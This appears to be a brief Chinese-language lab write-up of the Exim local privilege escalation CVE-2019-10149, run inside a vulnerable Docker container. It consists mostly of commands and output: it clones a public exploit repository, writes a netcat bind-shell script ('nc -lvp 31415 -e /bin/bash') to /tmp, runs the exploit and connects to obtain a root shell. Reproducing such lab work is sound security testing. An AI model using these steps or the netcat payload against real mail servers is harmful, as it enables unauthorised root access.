CVE-2019-10149 Exim 本地权限提升 LPE

<!–more–>

正文

git clone https://github.com/dhn/exploits

docker build -t vuln/cve-2019-10149 .
docker run --rm -it vuln/cve-2019-10149

测试过程

 team@blackloutus01 >>> ~/develop/vulhub-master/exploits/CVE-2019-10149 > master > sudo su
[sudo] password for team: 
[root@blackloutus01 CVE-2019-10149]# docker run --rm -it vuln/cve-2019-10149
No directory, logging in with HOME=/
$ cd /tmp
$ vim sh
$ cat /tmp/sh
#!/usr/bin/env sh
nc -lvp 31415 -e /bin/bash
$ chmod +x /tmp/sh
$ ./exploit.sh 
[+] CVE-2019-10149 exploit by dhn
[+] Send mail...
[+] Execute /tmp/sh!
[+] Done
$ nc 127.0.0.1 31415
id
uid=0(root) gid=0(root) groups=0(root)
exit
$ id
uid=1000(exim) gid=1000(exim) groups=1000(exim)

• #CloudScanner
• #Penetration Testing